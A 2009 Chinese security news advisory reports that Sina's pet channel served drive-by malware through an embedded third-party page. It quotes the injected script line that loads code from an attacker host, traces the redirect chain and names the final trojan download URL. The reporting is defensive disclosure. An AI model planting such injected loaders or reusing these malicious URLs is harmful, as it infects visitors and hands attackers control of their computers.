新浪宠物频道被植入恶意代码

来源:岁月联盟 编辑:zhuzhu 时间:2009-06-22
  接到网友举报称新浪宠物频道(hxxp://pet.sina.com.cn/)被植入恶意代码。经知道创宇安全团队确认,此次挂马事件的起因是由于宠酷网被挂马,而被挂页面经新浪宠物频道引用。  用户访问该页面将可能被安 ...

  接到网友举报称新浪宠物频道(hxxp://pet.sina.com.cn/)被植入恶意代码。经知道创宇安全团队确认,此次挂马事件的起因是由于宠酷网被挂马,而被挂页面经新浪宠物频道引用。

  用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

  MalUrl:hxxp://poke.petkoo.com/member/js/1.js

  该脚本尾部被植入恶意代码:

  document.write(’<script src=hxxp://google.08.cn/js/O8.js?sohu></script>’)

  挂马分析:

  [wide]hxxp://pet.sina.com.cn/

  [frame]hxxp://www.petkoo.com/index/right.shtml

  [frame]hxxp://bj.sina.com.cn/petkoo/4.html

  [frame]hxxp://poke.petkoo.com/member/indexlogin.aspx

  [script]hxxp://poke.petkoo.com/member/js/1.js

  [script]hxxp://google.08.cn/js/o8.js?sohu

  [frame]hxxp://csa22eeq.cn/08/0008.htm?22

  [frame]hxxp://csa22eeq.cn/08/index.html

  [frame]hxxp://csa22eeq.cn/08/ct14.htm

  [frame]hxxp://csa22eeq.cn/08/ctfl.htm

  [frame]hxxp://csa22eeq.cn/08/z.htm

  [frame]hxxp://csa22eeq.cn/08/ctvod.htm

  [frame]hxxp://csa22eeq.cn/08/ctxxz.htm

  [frame]hxxp://csa22eeq.cn/08/ctqm.htm

  [frame]hxxp://csa22eeq.cn/08/ctlb.htm

  [frame]hxxp://csa22eeq.cn/08/ct122121.htm

  [script]hxxp://js.tongji.linezing.com/1116244/tongji.js

  挂马页面被新浪宠物频道引用:

  最终下载病毒文件:

  hxxp://4534rr232323.cn/q8.exe

  通过执行以上病毒文件,来达到完全控制访问者的系统。

  知道创宇安全已经于确认挂马后第一时间通知新浪官方处理。

  知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:hxxp://www.cert.org.cn/

  推荐的应对方法:

  1.安装客户端保护软件。

  2.检查更新windows及第三方软件补丁程序。

关键字:恶意代码
上一篇:长春仲裁委员会网站遭遇黑客入侵被挂马
下一篇:黑客派人到网吧收集IP地址 打击竞争对手

最近更新

随机推荐